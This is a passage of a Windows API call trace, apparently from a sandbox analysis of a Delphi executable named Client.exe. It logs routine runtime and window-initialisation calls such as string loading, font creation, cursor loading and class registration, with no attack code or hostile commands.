lpProcName="VarBstrFromCy") returned 0x75817fdc [0285.743] GetProcAddress (hModule=0x757f0000, lpProcName="VarBstrFromDate") returned 0x75807a2a [0285.743] GetProcAddress (hModule=0x757f0000, lpProcName="VarBstrFromBool") returned 0x75810355 [0285.743] VarBstrFromBool (in: boolIn=0, lcid=0x400, dwFlags=0x0, pbstrOut=0x18ff24 | out: pbstrOut=0x18ff24*="False") returned 0x0 [0285.743] CharLowerBuffW (in: lpsz="False", cchLength=0x5 | out: lpsz="false") returned 0x5 [0285.743] CharUpperBuffW (in: lpsz="False", cchLength=0x5 | out: lpsz="FALSE") returned 0x5 [0285.744] VarBstrFromBool (in: boolIn=1, lcid=0x400, dwFlags=0x0, pbstrOut=0x18ff24 | out: pbstrOut=0x18ff24*="True") returned 0x0 [0285.744] CharLowerBuffW (in: lpsz="True", cchLength=0x4 | out: lpsz="true") returned 0x4 [0285.744] CharUpperBuffW (in: lpsz="True", cchLength=0x4 | out: lpsz="TRUE") returned 0x4 [0285.744] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xe0 [0285.744] GetACP () returned 0x4e4 [0285.744] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fedc | out: lpCPInfo=0x18fedc) returned 1 [0285.744] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xe4 [0285.744] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe8 [0285.745] QueryPerformanceFrequency (in: lpFrequency=0x83e890 | out: lpFrequency=0x83e890*=100000000) returned 1 [0285.753] QueryPerformanceCounter (in: lpPerformanceCount=0x18fef4 | out: lpPerformanceCount=0x18fef4*=3101195801392) returned 1 [0285.753] GetVersionExW (in: lpVersionInformation=0x18fe28*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x4, dwMinorVersion=0x9c296c, dwBuildNumber=0x4, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fe28*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0285.908] GetTimeZoneInformation (in: lpTimeZoneInformation=0x9bb37c | out: lpTimeZoneInformation=0x9bb37c) returned 0x1 [0285.930] LoadStringW (in: hInstance=0x400000, uID=0xfeea, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Invalid time Offset string: %s") returned 0x1e [0285.930] LoadStringW (in: hInstance=0x400000, uID=0xfee9, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Invalid time string: %s") returned 0x17 [0285.930] LoadStringW (in: hInstance=0x400000, uID=0xfee8, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Invalid date string: %s") returned 0x17 [0285.930] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=3101213566210) returned 1 [0285.931] GetDC (hWnd=0x0) returned 0x2010225 [0285.932] GetDeviceCaps (hdc=0x2010225, index=90) returned 96 [0285.932] ReleaseDC (hWnd=0x0, hDC=0x2010225) returned 1 [0285.932] GetDC (hWnd=0x0) returned 0x2010225 [0285.932] GetDeviceCaps (hdc=0x2010225, index=104) returned 0 [0285.933] ReleaseDC (hWnd=0x0, hDC=0x2010225) returned 1 [0285.933] CreatePalette (plpal=0x18fb24) returned 0x50801db [0285.933] GetStockObject (i=7) returned 0x1b00017 [0285.933] GetStockObject (i=5) returned 0x1900015 [0285.933] GetStockObject (i=13) returned 0x18a002e [0285.933] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0285.934] MulDiv (nNumber=9, nNumerator=96, nDenominator=72) returned 12 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.934] GetCurrentThreadId () returned 0xd44 [0285.935] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x9df5dc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0285.935] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeConditionVariable") returned 0x77a18456 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x9d8244, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0285.935] GetProcAddress (hModule=0x769b0000, lpProcName="WakeConditionVariable") returned 0x77a87de4 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x9df5dc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0285.935] GetProcAddress (hModule=0x769b0000, lpProcName="WakeAllConditionVariable") returned 0x77a4409d [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0285.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x9df5dc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0285.936] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableCS") returned 0x76a450d2 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.936] GetCurrentThreadId () returned 0xd44 [0285.937] GetCurrentThreadId () returned 0xd44 [0285.937] GetCurrentThreadId () returned 0xd44 [0285.937] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76e80000 [0285.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0285.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x9d826c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0285.937] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateInstanceEx") returned 0x76ec9d4e [0285.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0285.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x9c2dac, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0285.937] GetProcAddress (hModule=0x76e80000, lpProcName="CoInitializeEx") returned 0x76ec09ad [0285.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0285.937] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x9d826c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0285.937] GetProcAddress (hModule=0x76e80000, lpProcName="CoAddRefServerProcess") returned 0x76ee3cf3 [0285.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0285.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x9d826c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0285.938] GetProcAddress (hModule=0x76e80000, lpProcName="CoReleaseServerProcess") returned 0x76ee4314 [0285.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0285.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x9d826c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0285.938] GetProcAddress (hModule=0x76e80000, lpProcName="CoResumeClassObjects") returned 0x76e8ea02 [0285.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0285.938] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x9d826c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0285.938] GetProcAddress (hModule=0x76e80000, lpProcName="CoSuspendClassObjects") returned 0x76eebb02 [0285.938] SetErrorMode (uMode=0x8000) returned 0x1 [0285.938] LoadLibraryW (lpLibFileName="Msctf.dll") returned 0x774b0000 [0285.938] SetErrorMode (uMode=0x1) returned 0x8000 [0285.938] GetVersion () returned 0x1db10106 [0285.939] GetCurrentProcessId () returned 0xd40 [0285.941] GlobalAddAtomW (lpString="Delphi00000D40") returned 0xc020 [0285.941] GetCurrentThreadId () returned 0xd44 [0285.941] GlobalAddAtomW (lpString="ControlOfs0040000000000D44") returned 0xc021 [0285.941] RegisterClipboardFormatW (lpszFormat="DelphiRM_GetObjectInstance") returned 0xc05a [0285.941] SetErrorMode (uMode=0x8000) returned 0x1 [0285.941] LoadLibraryW (lpLibFileName="imm32.dll") returned 0x76b90000 [0285.941] SetErrorMode (uMode=0x1) returned 0x8000 [0285.942] GetSystemMetrics (nIndex=19) returned 0 [0285.942] GetSystemMetrics (nIndex=75) returned 0 [0285.942] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0285.943] LoadCursorW (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0285.943] LoadCursorW (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0285.943] LoadCursorW (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0285.943] LoadCursorW (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0285.943] LoadCursorW (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0285.943] LoadCursorW (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x400ab [0285.945] LoadCursorW (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x500b7 [0285.945] LoadCursorW (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x400ad [0285.945] LoadCursorW (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x30085 [0285.946] LoadCursorW (hInstance=0x400000, lpCursorName=0x7fff) returned 0x400bd [0285.946] LoadCursorW (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x300bb [0285.946] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0285.946] LoadCursorW (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0285.946] LoadCursorW (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0285.946] LoadCursorW (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0285.946] LoadCursorW (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0285.946] LoadCursorW (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0285.947] LoadCursorW (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0285.947] LoadCursorW (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0285.947] LoadCursorW (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0285.947] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0285.947] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0285.947] GetDC (hWnd=0x0) returned 0x2010225 [0285.947] GetDeviceCaps (hdc=0x2010225, index=90) returned 96 [0285.947] ReleaseDC (hWnd=0x0, hDC=0x2010225) returned 1 [0285.947] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x5db2d8, dwData=0x9cbf20) returned 1 [0285.948] GetCurrentThread () returned 0xfffffffe [0285.948] GetCurrentThreadId () returned 0xd44 [0285.948] GetCurrentThreadId () returned 0xd44 [0285.948] GetCurrentThreadId () returned 0xd44 [0285.948] GetCurrentThreadId () returned 0xd44 [0285.948] SystemParametersInfoW (in: uiAction=0x1f, uiParam=0x5c, pvParam=0x18fe68, fWinIni=0x0 | out: pvParam=0x18fe68) returned 1 [0285.948] CreateFontIndirectW (lplf=0x18fe68) returned 0xc0a01d9 [0285.949] GetObjectW (in: h=0xc0a01d9, c=92, pv=0x18fb60 | out: pv=0x18fb60) returned 92 [0285.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x18fa61, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0285.949] SystemParametersInfoW (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fc70, fWinIni=0x0 | out: pvParam=0x18fc70) returned 1 [0285.949] CreateFontIndirectW (lplf=0x18fdac) returned 0xc0a01da [0285.949] GetObjectW (in: h=0xc0a01da, c=92, pv=0x18fb60 | out: pv=0x18fb60) returned 92 [0285.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x18fa61, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0285.949] CreateFontIndirectW (lplf=0x18fd50) returned 0xc0a01d8 [0285.949] GetObjectW (in: h=0xc0a01d8, c=92, pv=0x18fb60 | out: pv=0x18fb60) returned 92 [0285.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x18fa61, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0285.950] CreateFontIndirectW (lplf=0x18fe08) returned 0x30a021e [0285.950] GetObjectW (in: h=0x30a021e, c=92, pv=0x18fb60 | out: pv=0x18fb60) returned 92 [0285.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x18fa61, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0285.950] CreateFontIndirectW (lplf=0x18fc88) returned 0x20a021d [0285.950] GetObjectW (in: h=0x20a021d, c=92, pv=0x18fb60 | out: pv=0x18fb60) returned 92 [0285.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x18fa61, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0285.954] OleInitialize (pvReserved=0x0) returned 0x0 [0286.086] LoadIconW (hInstance=0x400000, lpIconName="MAINICON") returned 0x300b9 [0286.087] GetIconInfo (in: hIcon=0x300b9, piconinfo=0x18fcb4 | out: piconinfo=0x18fcb4) returned 1 [0286.088] GetObjectW (in: h=0x105022a, c=24, pv=0x18fc9c | out: pv=0x18fc9c) returned 24 [0286.088] DeleteObject (ho=0x7050226) returned 1 [0286.088] DeleteObject (ho=0x105022a) returned 1 [0286.088] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x18fcee, nSize=0x100 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0286.088] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fc8c | out: lpWndClass=0x18fc8c) returned 0 [0286.088] RegisterClassW (lpWndClass=0x815c30) returned 0xc097 [0286.088] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xc0068 [0286.089] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x2e0000 [0286.089] SetWindowLongW (hWnd=0xc0068, nIndex=-4, dwNewLong=3018735) returned 4290132 [0286.090] GetClassInfoW (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 0 [0286.090] RegisterClassW (lpWndClass=0x81a7d4) returned 0xc098 [0286.090] GetSystemMetrics (nIndex=0) returned 1024 [0286.090] GetSystemMetrics (nIndex=1) returned 768 [0286.090] CreateWindowExW (dwExStyle=0x80, lpClassName="TApplication", lpWindowName="Client", dwStyle=0x84ca0000, X=512, Y=384, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x50092 [0286.090] LoadLibraryA (lpLibFileName="wtsapi32.dll") returned 0x75370000 [0286.319] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xa546c0 [0286.319] GetProcAddress (hModule=0x75370000, lpProcName="WTSRegisterSessionNotification") returned 0x75371cbc [0286.319] WTSRegisterSessionNotification (hWnd=0x50092, dwFlags=0x0) returned 1 [0286.818] LoadLibraryA (lpLibFileName="uxtheme.dll") returned 0x74430000 [0286.822] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xa5a040 [0286.822] GetProcAddress (hModule=0x74430000, lpProcName="BufferedPaintInit") returned 0x7444b8d4 [0286.822] BufferedPaintInit () returned 0x0 [0286.823] SetWindowLongW (hWnd=0x50092, nIndex=-4, dwNewLong=3018722) returned 4290132 [0286.823] SendMessageW (hWnd=0x50092, Msg=0x80, wParam=0x1, lParam=0x300b9) returned 0x0 [0286.824] NtdllDefWindowProc_W () returned 0x0 [0286.826] SetClassLongW (hWnd=0x50092, nIndex=-14, dwNewLong=196793) returned 0x0 [0286.827] GetSystemMenu (hWnd=0x50092, bRevert=0) returned 0x100c5 [0287.158] DeleteMenu (hMenu=0x100c5, uPosition=0xf030, uFlags=0x0) returned 1 [0287.158] DeleteMenu (hMenu=0x100c5, uPosition=0xf000, uFlags=0x0) returned 1 [0287.158] DeleteMenu (hMenu=0x100c5, uPosition=0xf010, uFlags=0x0) returned 1 [0287.159] GetCurrentThreadId () returned 0xd44 [0287.159] GetCurrentThreadId () returned 0xd44 [0287.159] GetCurrentThreadId () returned 0xd44 [0287.160] GetModuleHandleW (lpModuleName="USER32") returned 0x773b0000 [0287.160] GetCurrentThreadId () returned 0xd44 [0287.160] GetCurrentThreadId () returned 0xd44 [0287.160] GetCurrentThreadId () returned 0xd44 [0287.160] GetCurrentThreadId () returned 0xd44 [0287.160] GetCurrentThreadId () returned 0xd44 [0287.160] GetCurrentThreadId () returned 0xd44 [0287.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AnimateWindow", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AnimateWindow", cchWideChar=13, lpMultiByteStr=0x9c2eec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AnimateWindow", lpUsedDefaultChar=0x0) returned 13 [0287.161] GetProcAddress (hModule=0x773b0000, lpProcName="AnimateWindow") returned 0x773db531 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.161] GetCurrentThreadId () returned 0xd44 [0287.162] RegisterClipboardFormatW (lpszFormat="Delphi Picture") returned 0xc099 [0287.162] RegisterClipboardFormatW (lpszFormat="Delphi Component") returned 0xc09a [0287.162] RegisterClipboardFormatW (lpszFormat="commdlg_help") returned 0xc09b [0287.162] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc09c [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GlobalAddAtomW (lpString="WndProcPtr0040000000000D44") returned 0xc024 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.162] GetCurrentThreadId () returned 0xd44 [0287.163] GetCurrentThreadId () returned 0xd44 [0287.163] GetCurrentThreadId () returned 0xd44 [0287.163] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc09d [0287.163] LoadStringW (in: hInstance=0x400000, uID=0xfe83, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Alt+") returned 0x4 [0287.163] LoadStringW (in: hInstance=0x400000, uID=0xfe82, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Ctrl+") returned 0x5 [0287.163] LoadStringW (in: hInstance=0x400000, uID=0xfe81, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Shift+") returned 0x6 [0287.163] LoadStringW (in: hInstance=0x400000, uID=0xfe80, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Del") returned 0x3 [0287.163] LoadStringW (in: hInstance=0x400000, uID=0xfe9f, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Ins") returned 0x3 [0287.163] LoadStringW (in: hInstance=0x400000, uID=0xfe9e, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Down") returned 0x4 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe9d, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Right") returned 0x5 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe9c, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Up") returned 0x2 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe9b, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Left") returned 0x4 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe9a, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Home") returned 0x4 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe99, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="End") returned 0x3 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe98, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="PgDn") returned 0x4 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe97, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="PgUp") returned 0x4 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe96, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Space") returned 0x5 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe95, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Enter") returned 0x5 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe94, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Esc") returned 0x3 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe93, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="Tab") returned 0x3 [0287.164] LoadStringW (in: hInstance=0x400000, uID=0xfe92, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="BkSp") returned 0x4 [0287.164] GetCurrentThreadId () returned 0xd44 [0287.164] GetCurrentThreadId () returned 0xd44 [0287.164] GetCurrentThreadId () returned 0xd44 [0287.164] GetCurrentThreadId () returned 0xd44 [0287.165] GetCurrentThreadId () returned 0xd44 [0287.165] 